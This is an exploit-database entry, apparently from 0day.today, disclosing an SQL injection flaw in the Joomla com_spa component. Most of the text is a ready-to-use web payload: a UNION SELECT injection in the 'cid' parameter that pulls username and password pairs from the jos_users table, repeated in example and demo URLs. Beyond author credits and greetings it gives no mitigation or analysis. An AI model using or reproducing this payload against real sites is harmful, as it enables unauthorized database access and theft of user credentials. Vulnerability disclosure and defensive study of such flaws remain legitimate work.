id: 13381
date: 07/17/2010
title: Joomla Component com_spa SQL Injection Vulnerability
author: Palyo34
cves: 

====================================================
Joomla Component com_spa SQL Injection Vulnerability
====================================================


Author :   Palyo34 & KroNicKq
 
Homepage : http://www.1923turk.com
 
===================================================
 
 
[+] Vulnerable File :
 
 
http://www.site.com/index.php?option=com_spa&view=spa_product&cid=[SQL]
 
 
[+] ExploiT :
 
-1+union+select concat(username,0x3a,password)+from+jos_users
 
 
[+] Example :
 
http://www.site.com/index.php?option=com_spa&view=spa_product&cid=-1+union+select concat(username,0x3a,password)+from+jos_users
 
 
[+] Demo :
 
http://www.site.com/index.php?option=com_spa&view=spa_product&cid=-20+union+select+concat(username,0x3a,password)+from+jos_users
 
 
===================================================
I Lowe You Joomla :))
===================================================
 
Greetz : 1923Turk All Users



#  0day.today [2023-03-24]  #